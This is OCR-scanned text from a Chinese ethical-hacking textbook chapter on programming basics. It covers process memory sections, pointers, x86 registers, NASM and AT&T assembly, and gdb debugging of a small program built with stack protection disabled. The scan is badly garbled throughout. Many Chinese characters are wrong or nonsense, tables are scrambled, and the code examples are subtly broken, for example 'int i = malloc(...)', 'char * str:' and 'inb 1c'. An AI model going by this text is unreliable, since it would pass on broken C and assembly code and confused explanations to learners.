18 446 744 073 709 551 615( 即 2%-1) 的 十 进 制 数 。 在 64 位 AMD 和 Intel 处 理 器 的 内 存 
地 址 中 ， 只 使 用 低 48 位 ， 这 提供 了 256TB 的 可 寻 址 内 存 ， 大 量 的 在 线 资源 都 对 此 进 
行 了 记录 。 

计算 机 内 存 种 类 很 多 ， 我 们 主要 关注 的 是 RAM(Random Access Memory， 随 机 
存 取 存储 器 ) 和 寄存 器 。 寄 存 器 是 风 在 处 理 器 内 部 的 特殊 形式 的 内 存 ， 本 章 将 在 2.3 
节 的 “ 窜 存 器 ”小 节 中 对 其 做 进一步 介绍 。 


2.2.1 ”随机 存 取 存储 器 


随机 存 取 存储 器 (RAM) 中 存储 的 数据 在 任何 时 候 都 可 获取 , 这 就 是 “随机 存储 ” 
名 称 的 由 来 。 然 而 ，RAM 属 于 易 失 存储 器 ， 也 就 是 说 当 计 算 机 关闭 时 ，RAM 中 的 
所 有 数据 都 会 丢失 。 当 讨论 现代 基于 Intel/ 和 AMD 的 产品 (x86 和 x64) 时 ， 内 存 按 32 位 
或 48 位 寻 址 ， 意 思 就 是 说 ， 处 理 器 用 于 选取 特定 内 存 地 址 的 地 址 总 线 是 32 位 或 48 位 
宽 。 因 此 ，x86 处 理 器 最 大 可 寻 址 4 294 967 295 字 节 或 281 474 976 710 655 字 节 
(256TB). fEx64 64 位 处 理 器 上 ， 未 来 可 通过 添加 更 多 晶体 管 来 扩展 寻 址 范围 ; 但 在 
当前 系统 上 ，24 已 足以 满足 要 求 。 
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Danny Cohen 在 1980 年 的 Intermet 实 验 备 万 录 (Internet Experiment Note, IEN)137 
“On Holy Wars and a Plea for Peace” 中 讨论 字 届 序 (Endian) 时 ， 对 Swift 的 《 格 列 佛 
游记 》 进 行 了 忌 结 : 


格 列 佛 发 现 当今 国王 的 祖父 颁布 了 一 条 法 令 ， 小 人 国 的 公民 在 打破 鸡蛋 时 必须 
从 较 小 端 开始 。 当 然 ， 那 些 从 较 大 端 打破 鸡蛋 的 公民 对 此 非常 生气 ， 于 是 支持 从 较 
小 端 打 破 鸡 蛋 的 公民 和 支持 从 较 大 端 打破 鸡蛋 的 公民 之 间 发 生 了 一 场 战 争 。 最 后 ， 
那些 支持 从 较 大 端 打 破 鸡 蛋 的 公民 流亡 到 附近 的 岛屿 上 ， 建 立 了 不 来 夫 斯 古国 。 


Cohen 的 这 访 论 文 挡 述 了 问 内 存 和 存储 数据 时 的 两 种 不 同 思路 。 一 些 人 认为 低位 
字 节 应 该 首先 写 入 (Cohen 称 之 为 Little-Endians， 低 位 优先 )， 另 一 些 认 为 高 位 字 节 应 
该 首先 写 入 ( 称 为 Big-Endians， 局 位 优先 )。 两 种 思路 的 和 大 别 与 使 用 的 便 件 相关 。 例 
如 ， 基 于 Intel 技 术 的 处 理 器 使 用 低位 优先 ， 而 基于 摩托 罗拉 技术 的 处 理 器 则 使 用 融 
位 优先 。 


2.2.3 Aor 


分 段 (Segmentation) 这 个 主题 本 号 就 足以 占用 一 整 章 的 篇 幅 进 行 论 述 。 然 而 ， 分 
段 的 基本 概念 很 简单 。 每 个 进程 (简化 成 一 个 正在 执行 的 程序 ) 都 需要 访问 自己 在 内 
存 中 所 占 的 区 域 。 毕 竟 ， 我 们 肯定 不 希望 一 个 进程 可 以 覆盖 另 一 个 进程 的 数据 。 因 
此 ， 内 存 被 划分 成 多 个 小 的 分 段 ， 根 据 需 要 分 配给 进程 。 本 章 和 后 讨论 的 寄存 器 妆 
用 于 保存 和 记录 进程 维护 的 当前 分 段 的 信息 。 偏 移 寄 存 器 则 用 于 记录 所 保存 的 关键 
数据 在 分 段 中 的 具体 位 置 。 分 段 还 描述 了 进程 的 虚拟 地 址 空间 中 的 内 存 布局 。 诸 如 
代码 段 、 数 据 段 和 堆栈 段 的 分 段 专门 分 配 在 进程 中 虚拟 地 址 空间 的 不 同 区 域 ， 以 避 
倪 冲 突 ， 并 能 相应 地 设置 权限 。 每 个 运行 中 的 进程 都 获得 日 己 的 虚拟 地 址 空间 ， 空 
则 长 度 取决 于 架构 (如 32 位 或 64 位 )、 系 统 设 置 和 操作 系统 。 一 个 基本 的 32 人 Windows 
进程 默认 情况 下 获得 4GB 内 存 ，2GB 分 配给 进程 的 用 户 模 式 端 ，2GB 分 配给 进程 的 
内 核 模式 端 。 每 个 进程 只 有 一 小 部 分 虚拟 空间 映射 到 物理 内 存 ， 可 使 用 分 页 和 地 址 
转换 ， 通 过 多 种 方式 来 执行 虚拟 内 存 到 物理 内 存 的 映射 ， 具 体 取 决 于 架构 。 


224 内 存 中 的 程序 


加 载 到 内 存 后 ， 进 程 会 分 成 多 个 小 节 。 我 们 只 关注 6 种 主要 的 节 (Section)， 具 体 
内 容 接 下 来 将 详细 介绍 。 
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1. .text 节 

text 节 也 称 为 代码 段 , 基本 上 和 二 进 制 可 执行 文件 的 .text 部 分 保持 一 致 , 它 主 要 
包含 完成 任务 所 需 执行 的 机 器 指令 。.text 节 是 只 读 的 ， 如 果 堂 试 往 其 中 写 入 信息 ， 
则 会 导致 段 错误 。.text 节 的 长 度 在 运行 时 是 固定 的 ， 当 进程 首次 加 载 时 计算 。 


2. .data $ 

.data 广 用 于 存储 已 初始 化 的 全 局 变量 ， 例 如 : 

int a = 0; 

本 市 的 长 度 在 运行 时 也 是 国定 的 ， 应 将 其 标记 为 可 读 。 

3. .bss $ 

-bsst&% F (Below Stack Section) 用 于 存储 未 初始 化 的 全 局 变量 ， 例 如 : 
int a; 


这 一 节 的 长 度 在 运行 时 也 是 固定 的 。 这 个 分 段 应 当 是 可 读 和 可 写 的 ， 但 不 是 可 
执行 的 。 

4. JE TS 

堆 (Heap) 节 用 于 存储 动态 分 配 的 变量 ， 并 且 所 分 配 的 内 存 空间 采用 的 是 由 低地 
址 到 高 地 址 的 增长 方式 。 内 存 分 配 通 过 malloc、realloc 和 free 函 数 来 控制 。 例 如 ， 如 
果 想 声明 一 个 整数 并 在 运行 时 动态 分 配 内 存 ， 可 使 用 下 面 的 方式 : 


int i = malloc(sizeof(int)); // dynamically allocates an integer, 
// contains the preexisting value of that memory 


堆 市 应 当 是 可 读 和 可 写 的 ， 但 不 是 可 执行 的 ， 侍 则 ， 控 制 了 进程 的 攻击 者 可 在 
诸如 栈 和 扒 的 区 域 轻而易举 地 执行 shellcode。 


5. HT 


F(Stack) 13 HH-T- G3 VA) ise eA, TERR BEER pad P A 1 
低地 址 内 存 的 增长 方式 。 对 于 多 线程 而 言 ， 每 个 线程 将 具有 唯一 的 栈 。 在 下 面 的 内 
容 中 将 看 到 ， 栈 的 这 种 由 高 地 址 内 存 到 低地 址 内 存 的 增长 方式 导致 缓冲 区 溢出 的 存 
在 。 本 地 变量 也 存在 于 栈 节 中 。 第 11 章 将 进一步 讨论 栈 节 。 


6. 环境 /参数 证 
环境 /参数 节 用 于 存储 一 份 进程 在 运行 时 可 能 用 到 的 系统 级 变量 的 副本 。 例 如 ， 
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运行 中 的 进程 可 访问 路 径 、shell 名 称 以 及 主机 名 这 些 变量 。 环 境 /参数 节 是 可 写 的 ， 
因此 第 用 于 格式 化 字符 串 及 缓冲 区 洲 出 攻击 。 男 外 ， 命 令 行 参数 也 存储 在 这 块 区 域 
中 。 内 存 的 各 蔬 控 前面 给 出 的 顺序 存放 。 进 程 的 内 存 空间 如 图 2-1 所 示 。 

低位 地 址 高 位 地 址 


- 


图 2-1 进程 的 内 存 空间 
2.2.5 缓冲 区 


缓冲 区 (BuffepD 是 指 一 块 可 用 于 接收 和 存放 数据 的 存储 区 域 , 这 些 数 据 会 一 直 保 
留 到 东 个 进程 对 其 进行 处 理 为 止 。 由 于 每 个 进程 都 有 目 己 的 一 组 绥 神 区 ， 因 此 关键 
是 让 这 些 缓冲 区 你 持 连 续 。 在 进程 内 存 的 .data 太 和 .bss 广 中 分 配 内 存 束 可 以 实现 这 一 
扩 。 记 住 ， 绥 冲 区 一 旦 分 配 ， 其 长 度 也 惑 国定 了 。 
绥 冲 区 可 以 保留 任意 预定 义 类 型 的 数据 ， 但 本 书 将 主要 关注 学 符 捉 类 型 的 缓冲 
这 些 缓冲 区 将 用 来 存储 用 户 输 入 和 变量 。 


2.26 ”内存 中 的 字符 串 


简单 来 说 ， 字 符 串 其 实 束 是 内 存 中 连续 的 字符 数组 。 在 内 存 中 ， 通 过 字符 串 中 
第 一 个 字符 的 地 址 来 引用 。 字 符 串 以 一 个 空 字 符 ( 在 C 语 言 中 是 \0) 结 束 。\0' 古 一 个 
转 义 序列 的 示例 。 开 及 人 员 可 利用 转 义 序列 指定 特殊 操作 ， 如 使 用 m 指 定 换行 符 ， 
使 用 指定 回 车 。 反 笠 杠 确保 其 后 的 字符 不 会 被 视 为 字符 串 的 一 部 分 。 如 打 需 要 友 
冬 杠 本 里， 只 需要 使 用 转 义 序列 \， 此 时 将 只 显示 一 个 。 可 从 在 线 文 档 中 找到 各 种 
有 关 转 义 序 列 的 介绍 内 容 。 


2.2.7 ”指针 


指针 是 特殊 的 内 存 厂 段 ， 它 持 有 其 他 内 存 块 的 地 址 。 在 内 存 里面 移 动 数 据 属于 
相对 缓慢 的 操作 。 实 际 上 ， 与 其 移动 数据 ， goin 
位 置 ， 然 后 只 需要 修改 指针 即 可 ， 这 要 简单 得 多 。 指 针 被 保存 在 内 存 中 连续 的 4 字 
或 8 字 节 中 ， 具体 取决 于 应 用 程序 是 32 位 还 是 64 位 。 例如， 前 面 曾 提 到 ， i 
数组 中 首 个 字符 的 地 址 来 引用 字符 串 。 这 个 地 址 值 就 是 指针 。 因 此 ， 在 C 中 ， 字 符 
串 变 量 的 声明 如 下 所 示 : 


char * str; // This is read. Give me 4 or 8 bytes called str which is a 


区 


- 


// pointer to a Character variable (the first byte of the 
// array). 


有 一 所 非 弟 午 要 ， 屠 就 是 虽然 指 针 的 长 度 被 设 定 为 4 字 太 或 8 子 广 ,但 上 面 的 命 
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令 并 没有 设 定 字符 串 的 长 度 。 因 此 ， 这 个 数据 会 被 视 为 未 经 初始 化 ， 它 将 被 存放 到 
进程 内 存 的 .bss 节 中 。 

再 举 一 个 例子 ， 如 采 和 硕 望 存储 一 个 指 回 和 内存 中 茶 个 整数 的 指针 ， 那 么 可 在 C 程 
序 中 发 出 下 面 的 命令 : 


int * pointl;//this is read,give me 4 or 8 bytes called pointl,which is a 
//pointer to an integer variable. 


为 读 取 这 个 指针 所 指 同 的 内 存 地 址 的 值 , 需要 使 用 符号 * 来 解 引用 该 指针 。 因 此 ， 
如 果 和 希望 打印 上 面 代码 中 的 point1 所 指 同 的 整数 的 值 ， 那 么 需要 使 用 下 面 的 命令 : 


printf ("%d", *point1); 

其 中 ，* 用 于 将 指针 pointl 解 引用 ， 然 后 用 printf 函数 打印 整数 的 值 。 
2.2.8 ”内 存 知 识 小 结 

了 解 一 些 基础 知识 后 ， 下 面 列举 一 个 简单 示例 来 演示 程序 中 内 存 的 使 用 : 


#include <stdlib.h> 
#include <string.h> 


/* memory.c */ // this comment simply holds the program name 
int index = 5; // integer stored in data (initialized) 
char * str: // string stored in bss (uninitialized) 
int nothing; // integer stored in bss (uninitialized) 
void functi (int c)í // bracket starts functionl block 
inb 1c; // stored in the stack region 


str — (char*) malloc (10 * sizeof (char)); // Reserves 10 characters 
// in the heap region 
strncpy(str, "abcde", 5); // copies 5 characters "abcde" into str 


} // end of functionl 
void main (){ // the required main function 

funct1 (1); // main calls functionl with an argument 
} // end of the main function 


这 个 程序 并 没有 多 少 功能 。 首 先 ， 在 进程 内 存 的 不 同 节 中 分 配 几 块 内 存 。 执 生 
maine ACY, dal A funct] ER ZIDJPfE A S1. — H functi HARA, VASE Lh 
给 函数 变量 c。 接 下 来 ， 在 堆 中 为 一 个 10 字 节 字 符 串 str 分 配 内 存 。 最 后 ， 将 一 个 5$ 字 
节 的 字符 串 abcde 复 制 到 新 变量 str 中 。 接 看 functl 函 数 结 束 ， 随 后 main 函 数 结束 。 


CA 警告， 在 继续 阅读 本 书后 续 内 容 前 ， 必 须 很 好 地 党 握 这 些 知识 。 因 此 ， 奸 
\ x M | wc NT e n Lo : » wm 
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2.3 |Intel 处 理 器 


目前 存在 几 种 常用 的 计算 机 架构 (Architecture)。 本 章 将 关注 Intel 系 列 处 理 器 或 架 
构 。 这 里 的 术语 “架构” 指 的 是 特定 制造 商 实 现 其 处 理 占 的 方式 。 当 今 所 使 用 的 大 
部 分 处 理 右 部 是 X86 和 x86-64 染 构 ， 但 诺 如 ARM 的 染 构 每 年 都 在 人 不断 发 展 。 每 种 染 
构 都 使 用 独特 的 指令 集 。 一 种 类 型 的 处 理 器 中 所 使 用 的 指令 ， 男 一 种 类 型 的 处 理 器 
是 无 法 理解 的 。 


寄存 器 

寄存 器 (Register) 用 于 临时 存储 数据 。 可 将 寄存 器 看 成 处 理 器 内 部 使 用 的 快速 8 
位 或 64 位 内 存 块 。 可 将 寄存 器 划分 为 4 大 类 (32 位 寄存 器 的 前 级 是 E，64 位 寄存 右 的 前 
级 是 R， 如 EAX 和 RAX)。 表 2-4 列 出 了 这 些 分 类 及 说 明 。 


表 2-4 ” 宵 存 器 的 分 类 及 说 明 
寄存 器 类 别 寄存 器 名 称 作用 
32 位 : EAX, EBX, ECX, EDX 
通用 寄存 器 | 64 位 : RAX, RBX, RCX, RDX, 用 于 操作 数据 
R8-R15 


Ax, ES. CX. Dx 上 述 寄 存 占 的 16 位 版 本 
AH、BH、CH、DH、AL、BL、CL、DL | 上 述 寄 存 器 的 8 位 高 位 字 节 和 低位 字 节 
16 位 寄存 占 , 存放 着 内 存 地 址 的 前 半 部 
Boy ff nh CS. SS, DS. ES. FS. GS 分 ; 存放 着 指向 代码 、 栈 和 额外 数据 段 
的 指针 


EBP 指 癌 函数 栈 的 本 地 环境 的 起 始 位 
置 。64 位 使 用 基 址 指针 , 具体 取决 于 框 
AH el NE. 1B n X DS TA 
R8-R15 的 使 用 

存放 着 使 用 内 存 块 的 操作 中 源 数 据 
存放 看 使 用 内 存 块 的 操作 中 目的 数据 
ESP/RSP( 栈 指针 寄存 器) 指 问 栈 项 的 指针 


EBP/RBP(JEAETRET BF E28) 


ESIRSI( 源 变 址 寄存 器 ) 


EDI/RDI( H BJ2EAEZT (£28) 
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CALES 作用 


特殊 寄存 器 | ”| 仅 由 CPU 使 用 
EFLAGS 或 RFLAGS 标 志 寄 存 器 。 
要 了 解 的 关键 标记 有 ZF=zero flag. | CPU 用 来 跟踪 逻辑 结果 和 处 理 器 状态 
IF-Interrupt enable flag. SF=sign flag 
EIP/RIP(th t REL SE f 48) 指 回 要 执行 的 下 一 条 指令 的 地 址 


2.4 汇编 语言 基础 


虽然 有 许多 书籍 专门 评述 如 何 使 用 汇编 (ASMD) 语 言 ， 但 本 市 给 出 的 一 些 基础 知 
识 可 以 让 你 更 容易 地 和 苔 握 它 ， 从 而 成 为 一 个 更 高 效 的 道德 黑客 。 


241 机 器 语言 、 汇 编 语 言 与 C 语 言 


计算 机 只 能 理解 机 器 语言 ， 也 就 是 由 1 和 0 组 成 的 模式 。 而 人 类 却 难 以 理解 由 大 
量 1 和 0 组 成 的 字符 序列 ， 因 此 人 们 设计 了 汇编 语言 ， 通 过 助 记 符 来 帮助 程序 员 记 忆 
数字 序列 。 后 来 ， 人 们 设计 了 更 高 级 的 语言 ， 如 C 语 言及 其 他 语言 ， 这 些 高 级 语言 
进一步 让 人 类 远离 了 1 和 0。 但 是 ， 如 果 你 希望 成 为 一 个 优秀 的 道德 黑客 ， 束 不 能 循 
规 蹈 矩 ， 仅 仅 学 习 高 级 语言 ， 而 是 一 定 要 回 过 头 来 掌握 汇编 语言 的 基础 知识 。 


2.4.2 AT&T 与 NASM 


汇编 语法 主要 有 两 种 形式 : AT&T 和 Intel。AT&T 语 法 主要 由 GNU 汇 编 器 (GAS， 
包含 在 gcc 编 详 嚣 套件 中 ) 使 用 ，Linux 开 友人 员 通 第 也 使 用 该 形式 。 在 采用 Intel 语 法 
形式 的 汇编 器 中 ， 最 常用 的 是 NASMQNetwide Assembler)。NASM 格 式 被 许多 
Windows 汇 编 占 和 调试 器 及 用 。 里 然 这 两 种 格式 生成 的 机 句 语 言 是 完全 一 样 的 ， 但 
在 风格 和 格式 方面 存在 一 些 才 异 。 
e 源 和 目的 操作 数 的 位 置 是 倒 ， 而 且 使 用 不 同 的 符号 来 标记 注释 的 起 始 位 置 。 
。 NASM 格 式 : CMD «dest, <source><; comment» 
。 AT&T 格 式 : CMD «source», <dest><# comment» 
e AT&T 格 式 在 寄存 右前 面 使 用 % 符 写 , 而 NASM 丰 需要。% 音 指 “ 间 接 操作 数 ”。 
e AT&T 格 式 在 字面 值 前 面 使 用 $ 符 号， 而 NASM 不 需要 。$ 意 指 “ 立即 操 作 数 ”。 
e AT&T 处 理 内 存 引 用 的 方式 与 NASM 人 不同。 
本 节 将 采用 NASM 格 式 给 出 每 一 条 命令 的 语法 和 示例 。 此 外 ， 作 为 对 比 ， 我 们 
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将 给 出 同一 条 命令 的 AT&T 格 式 。 一 般 而 言 ， 所 有 命令 均 采 用 如 下 格式 : 
«optional label:> <mnemonic> <operands> «optional comments> 


操作 数 ( 实 参 ) 的 个 数 取 决 于 命令 ( 助 记 符 )。 尽 官 有 许多 汇编 指令 , 但 我 们 只 需要 
精明 其 中 少数 几 个 即 可 。 下 面 将 对 这 些 指令 进行 说 明 。 


1. mov 


mov 命 令 用 于 将 源 操作 数 复 制 到 目的 操作 数 ， 而 原 数 据 值 不 会 从 源 位 置 移 除 ， 
如 表 2-5 所 示 。 


表 2-5 mov 命令 


NASM 语 法 NASM 示 例 AT&T 示 例 


mov «dest», <source> mov eax, 51h;comment movl $51h, %eax #comment 


不 能 直接 将 数据 从 内 存 移 到 某 个 段 寄存 器 中 。 相 反 ， 必 须 使 用 通用 寄存 器 作为 
中 间 跳 板 ， 如 下 所 示 : 


mov eax, 1234h ; store the value 1234 (hex) into EAX 
mov CS, ax ; then copy the value of AX into CS. 


2. add 5 sub 


add 命 令 用 于 将 源 操作 数 与 目的 操作 数 相 加 , 并 将 结果 存储 在 目的 操作 数 中 。sub 
命令 用 于 将 源 操作 数 从 目的 操作 数 中 减 去 ， 并 将 结果 存储 在 目的 操作 数 中 ， 如 表 2-6 
PIE 
表 2-6 add 和 sub 命 令 
NASM 语 法 NASM 示 例 AT&T 示 例 
add «dest», <source> add eax, 51h addl $51h, %eax 


sub «dest», «source» sub eax, 51h subl $51h, “eax 
3. push 5 pop 
push 和 pop 命 令 分 别 用 于 入 栈 和 出 栈 ， 如 表 2-7 所 示 。 


表 2-7 push 和 pop 命 令 
NASMi&;E NASM 示 例 AT&T 示 例 
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4. xor 


xor 命 令 用 于 进行 按 位 逻辑 “ 异 或 ”(XOR) 运 算 , 例如 ，11111111 XOR 11111111 
= 00000000。 因 此 ，XOR value, value S n H FK ATREA TMERR AAT, W 
表 2-8 所 示 。 另 一 个 常用 的 按 位 操作 符 是 AND。 可 执行 按 位 AND 来 确定 寄存 器 或 内 
存 位置 中 的 特定 位 是 否 已 设置 ， 或 确定 对 malloc 之 类 的 函数 调用 返回 对 内 存 块 的 指 
针 而 非 null。 为 此 , 可 在 调用 malloc 后 使 用 test eax, eax 之 类 的 汇编 语言 。 如 果 对 malloc 
的 调用 返回 null， 则 test 操 作 将 FLAGS 寄 存 右 中 的 零 标 志 (Zero Flag) 设 置 为 1。test 之 
后 诸如 jnz 的 条 件 跳 转 指 令 所 遵循 的 路 入 可 基于 AND 操 作 的 结果 。 下 面 是 汇编 语言 
代码 : 

call malloc(100) 


Lest eax, eax 
jnz loc 6362cc012 


表 2-8 xor 命 今 


NASMi&;E NASM 示 例 AT&T 示 例 
xor «dest», <source> xor Voeax, Voeax 


5.jne. je. jz, jnz 4 jmp 


jne, je. jz. jnzlljmpfti 4 TR H bros ay 4f 88 HIT] oe Meflag^E EE] x» Ul 
REE MET O, nejnzWizEbk WREST 1, jeza; mmp 
会 跳 转 ， 如 表 2-9 所 示 。 


表 2-9 jne、jnz、je、jz 和 jmp 命 令 


NASM 语 法 NASM 示 例 AT&T 示 例 


cct ec mm 
"IT TT 


6. call E ret 


call 命 令 将 执行 重 定 加 到 另 一 个 图 数 。call 命 令 之 后 的 虚拟 内 存 地 址 首先 入 栈 ， 
作为 返回 指针 ， 然 后 将 执行 重 定 同 到 被 调 函 数 。ret 命 令 用 在 过 程 末 尾 处 ， 用 于 将 控 
制 流 程 返 回 到 call 之 后 的 那 条 命令 ， 如 表 2-10 所 示 。 
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表 2-10 ”call 和 ret 命 令 


NASM 语 法 NASM 示 例 AT&T 示 例 
call <dest> call subroutinel call subroutinel 
ret ret ret 


T. inc 和 dec 
inc 和 dec 命 令 用 于 将 目的 操作 数 违 增 或 递减 ， 如 表 2-11 所 示 。 


表 2-11 inc 和 和 dec 命令 


NASM 语 法 NASM 示 例 AT&T 示 例 


dec <dest> dec eax 


decl 9oeax 


8. lea 


d 
BE 


lea 命 令 用 于 将 源 操作 数 的 有 效 地 址 加 载 到 目的 操作 数 中 ， 如 表 2-12 所 示 。 将 目 
的 实 参 传 给 字符 串 复 制 函数 时 ， 种 看 到 这 种 情形 ; 在 下 面 的 AT&T 语 法 gdb 谍 编 语言 


示例 中 ， 将 目的 缓 神 区 地 址 写 入 栈 顶 ， 作 为 gets 函 数 的 实 参 : 
lea -Ox20(%ebp), $eax 


mov $eax, ($esp) 
call 0x8048608 <gets@plt> 


表 2-12 lea 命 令 


NASMi&7X NASM 示 例 AT&T 示 例 


lea «dest», <source> lea eax, [dsi + 4] leal 4(%ds1), Y%oeax 


9. 系统 调用 : int, sysenter 和 syscall 


系统 调用 是 一 种 机 制 。 进 程 通 过 系统 调用 ， 请 求 执行 特权 操作 ， 此 时 ， 上 下 文 
和 代码 执行 从 用 户 模 式 切 换 到 内 核 (Kernal) 模 式 。 传统 的 x86 使 用 int 0x80 执 行 系统 调 


用 ， 现 已 不 建议 使 用 这 个 命令 ， 但 32 位 操作 系统 仍然 支持 它 。 在 32 位 应 用 程序 中 ， 


使 用 sysenter 指 令 。 对 于 64 位 Linux 操 作 系统 和 应 用 程序 ， 需 要 使 用 syscall 指 令 。 在 编 
写 shellcode 以 及 其 他 专用 程序 或 载荷 时 ， 必 须 透 彻 地 理解 用 于 执行 系统 调用 和 设置 


适当 实 参 的 各 种 方法 o 


2.4.3 FIBRA 


在 汇编 语言 中 ， 实 现 同一 个 功能 的 方法 可 能 有 多 种 。 例 如 ， 指 示 内 存 中 要 操作 
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lab BAK 


KAROBI 34:90 VE PR. AEn ENTARRA TERR, 62-138 Ey 
式 进 行 了 忆 结 。 


3x2-13 ” 寻 址 模式 


寻 址 模式 说 明 NASM 示 例 
| ay fF ae PAIN PRETEEN BU. AYIA | mov rbx, rdx 
Ay Pas E | | 
Fo DAN ey FF aa IRIE Al BL add al, ch 
. 源 操作 数 下 一 个 数值 。 默 认为 十 进 制 ， 使 用 h | mov eax, 1234h 
BPŽ hE 
表示 十 六 进 制 mov dx, 301 
mm 第 1 个 操作 数 是 要 操作 的 内 存 地 址 ， 该 操作 数 | mov bh, 100 
用 方 括号 括 起 来 mov[4321h], bh 
"— SBS RTESUDE JI 48 Ss FWP area, VA | 
Ay FF 88 IH] Be S b NEM | mov[di], ecx 
存 器 存放 看 要 操作 的 地 址 
BEEN 要 操作 的 有 效 地 址 是 通过 使 用 ebx'ebp 加 上 一 | | 
AY AF ts FEY PE BEEN mov edx, 20[ebx | 
AM Aim AZ ELT SCHADE 
- HE GG BS PE, fHf5Hljedifllesio F 
基 址 加 变 址 寻 址 mov ecx,20[esi] 


BAM ES 
来 计算 有 效 地 址 


相对 基 址 加 变 址 寻 址 mov ax, [bx][si]-1 


2.44 汇编 文件 结构 


汇编 源 文 件 可 分 成 以 下 几 闻 。 

e model: .model 指 令 用 于 指示 .data 和 .text 节 的 长 度 。 

e stack: .stack 指 令 标记 栈 节 的 起 始 位 置 ， 并 用 于 指示 栈 的 长 度 (以 字 贡 为 单位 )。 

e data: .data 指 令 标 记 数 据 和 的 起 始 位 置 ， 并 用 于 定义 变量 (包括 已 经 初始 化 
的 和 未 经 初始 化 的 )。 

e text: .text 指 令 包 含 用 于 存放 程序 的 命令 。 

例如 ， 下 面 的 汇编 程序 可 同 屏 人 莫 上 打印 字 从 串 “Hello, haxor! ": 


section .data ; Section declaration 

msg db "Hello, haxor!",0xa ; our string with a carriage return 
len equ $ - msg ; length of our string, $9 means here 
section .text ; mandatory section declaration 


; export the entry point to the ELF 


第 2 章 编程 技能 


global start ; linker or loaders conventionally 


; recognize start as their entry point 


Start: 

; now, write our string to stdout 

; notice how arguments are loaded in reverse 
mov edx,len ; third argument (message length) 
mov ecx,msg ; second argument (pointer to message to write) 
mov ebx, 1 ; load first argument (file handle (stdout) ) 
mov eax,4 ; System call number (4=sys write) 
int 0x80 ; call kernel interrupt and exit 
mov ebx, 0 ; load first syscall argument (exit code) 
mov eax, 1 ; system call number (l=sys exit) 
int 0x80 ; call kernel interrupt and exit 


2.4.5 ”汇编 过 程 
汇编 过 程 的 第 1 步 是 生成 目标 代码 (32 位 示例 ): 
S nasm -f elf hello.asm 
Be ROK, Val FA BEBE DAE RE RI AAT REI : 
S ld -s -o hello hello.o 
最 后 ， 运 行 可 执行 程序 : 


S ./hello 
Hello, haxor! 


25 使 用 gdb 进 行 调 试 


在 UNIX 系 统 上 使 用 C 语 言 进行 编程 时 ， 自 选调 试 右 为 gdb。 它 提供 了 强大 的 命 
令 行 接口 ， 可 在 运行 程序 的 同时 保持 全 面 的 控制 。 例 如 ， 可 在 程序 执行 过 程 中 设置 
断 点 ， 从 而 在 任何 想 要 的 地 方 监 视 内 存 或 寄存 器 的 内 容 。 因 此 ， 对 于 程序 员 和 黑客 
来 说 ， 像 gdb 这 样 的 调试 器 当 属 无 价 之 宝 。 如 果 要 在 Linux 上 获得 更 多 图 形体 验 ， 可 
改 用 ddd 和 edb 等 扩展 。 


2.5.1 gdb 基 础 
表 2-14 列 出 了 常用 的 gdb 命 令 及 其 说 明 。 
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表 2-14 ” 单 用 的 gdb 命 令 及 其 说 明 
说 明 


b «function» fEfunction AF V E — 4 Ir ja 

b *mem 在 指定 的 绝对 内 存 位 置 设置 一 个 断 点 
infob ‘mth AA AAS E 

delete b 移 除 一 个 断 点 

run <args> 在 gdb 凡 使 用 给 定 的 参数 开始 调试 程序 
info reg ath AK SB ar ee AAS fa E 


stepi or si 


TT AB Laat} 


next or n 执行 一 个 函数 

bt 回调 命令 ， 输 出 栈 师 的 名 称 
up/down fr dpi [a] Fak la] P292] 
print var 打印 变量 的 值 


打印 寄存 器 的 值 
检查 内 存 ， 其 中 N 表 示 要 显示 的 单位 数 ，7 表 示 要 显示 的 数据 类 型 (x: 十 六 


punt /x $<reg> 


x /NT A 进 制 ，d: 十 进 制 ，c: 字 符 ，s: 字 符 串 ,fi 指令 )，4 表 示 绝 对 地 址 或 诸如 main 
的 符号 名 称 
quit 退出 gdb 


要 调试 前 面 的 示例 程序 , 我 们 输入 下 面 的 命令 。 第 一 条 命令 将 重新 编译 该 程序 ， 
使 其 包含 调试 和 其 他 有 用 选项 (参见 表 2-3)。 


$gcc -ggdb -mpreferred-stack-boundary-2 -fno-stack-protector -o meet 
meet.c 

Sgdb -q meet 

(gdb) 
Starting program: /home/aaharper/book/meet Mr Haxor 
Hello Mr Haxor 


Bye Mr Haxor 


run Mr Haxor 


Program exited with code 015. 

(gdb) b main 

Breakpoint 1 at 0x8048393: file meet.c, 
(gdb) run Mr Haxor 


line 9. 
Starting program: /home/aaharper/book/meet Mr Haxor 
Breakpoint 1, main (argc-3, argv-Oxbffffbe4) at meet.c:9 


9 greeting(argv[1],argv[21]); 
(gdb) n 
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Hello Mr Haxor 


10 printf ("Bye $s $s\n", argv[1], argv[2]); 
(gdb) n 

Bye Mr Haxor 

11 } 


(gdb) p argv[1] 

$1 = Oxbffffd06 "Mr" 
(gdb) p argvi2] 

$2 — Oxbffffd09 "Haxor" 
(gdb) p argc 


$3 = 3 

(gdb) info b 

Num Type Disp Enb Address What 

1 breakpoint keep y 0x08048393 in main at meet.c:9 


breakpoint already hit 1 time 
(gdb) info reg 


eax Oxd 13 
ecx 0x0 0 
edx Oxd i 
„truncated for brevity... 
(gdb) quit 


A debugging session is active. 
Do you still want to close the debugger? (y or n) y 
$ 


25.2 ”使 用 gdb 进 行 反 汇 编 
要 使 用 gdb 生 成 反 汇 编 代 码 ， 需 要 输入 下 面 的 两 条 命令 : 


set disassembly-flavor <intel/att> 
disassemble «function name» 


第 一 条 命令 用 于 在 IntelNASM) 和 AT&T 两 种 格式 之 间 来 回 切换 。 默 认 情 况 下 ， 
gdb 使 用 AT&T 格 式 。 第 二 条 命令 用 于 反 汇 编 给 定 的 函数 (包括 main 函 数 )。 例 如 ， 要 
采用 两 种 格式 来 反 汇 编 图 数 greeting， 则 输入 如 下 命令 : 


Sgdb -q meet 

(gdb) disassemble greeting 

Dump of assembler code for function greeting: 
0x804835c «greeting»: push  $ebp 

0x804835d <greetingt+1>: mov Sesp,S$ebp 
0x804835f <greeting+3>: sub $0x190,$esp 
0x8048365 <greetingt+9>: pushl Oxc(%ebp) 


0x8048368 <greetingt12>: lea Oxfffffe/0 (sebp) , seax 
0x804836e «greeting-t18»: push  $eax 

0x804836f <greeting+19>: call 0x804829c <strcpy> 
0x8048374 <greetingt24>: add $0x8,$esp 

0x8048377 <greetingt27>: lea Oxfffffe/O0(*ebp),S*eax 


37 


38 


第 1 部 分 A A 


0x804837d <greeting+33>: push  $eax 

0x804837e <greetingt+34>: pushl 0x8 (%ebp) 
0x8048381 <greetingt37>: push $0x8048418 
0x8048386 <greetingt42>: call | 0x804828c <printf> 
